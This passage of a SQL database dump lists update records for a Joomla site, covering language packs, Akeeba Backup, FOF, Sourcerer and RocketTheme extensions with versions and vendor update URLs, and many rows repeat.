Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7792,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7793,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7794,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7795,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7796,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7797,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7798,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7799,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7800,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7801,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7802,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7803,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7804,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7805,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7806,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7807,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7808,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7809,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7810,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7811,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7812,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7813,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7814,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7815,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7816,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7817,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7818,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7819,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7820,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7821,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7822,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7823,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7824,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7825,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7826,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7827,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7828,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7829,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7830,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7831,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7832,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(7833,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7834,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7835,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7836,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7837,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7838,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7839,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7840,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7841,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7842,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7843,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7844,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7845,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7846,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7847,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7848,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7849,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7850,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7851,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7852,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7853,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7854,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7855,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7856,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7857,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7858,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7859,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7860,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7861,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7862,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7863,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7864,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7865,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7866,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7867,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7868,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7869,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7870,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7871,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7872,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7873,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7874,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7875,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7876,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7877,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7878,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7879,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7880,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7881,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7882,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7883,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7884,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7885,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7886,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7887,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7888,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(7889,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7890,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7891,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7892,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7893,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7894,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7895,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7896,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7897,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7898,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7899,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7900,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7901,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7902,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7903,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7904,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7905,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7906,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7907,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7908,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7909,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7910,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7911,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7912,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7913,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7914,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7915,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7916,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7917,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7918,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7919,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7920,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7921,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7922,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7923,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7924,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7925,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7926,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7927,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7928,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7929,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7930,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7931,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7932,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7933,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7934,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7935,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(7936,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(7937,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(7938,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(7939,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(7940,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7941,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7942,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7943,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(7944,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(7945,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(7946,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(7947,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(7948,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(7949,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(7950,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(7951,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(7952,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(7953,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(7954,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(7955,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(7956,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(7957,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(7958,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(7959,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(7960,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(7961,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(7962,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(7963,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(7964,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(7965,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(7966,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(7967,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(7968,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(7969,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(7970,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(7971,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(7972,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(7973,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(7974,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(7975,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(7976,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(7977,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(7978,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(7979,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(7980,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(7981,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(7982,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(7983,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(7984,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(7985,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(7986,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(7987,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(7988,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(7989,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(7990,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(7991,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(7992,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(7993,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7994,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(7995,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7996,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(7997,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7998,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(7999,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8000,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8001,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8002,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8003,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8004,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','h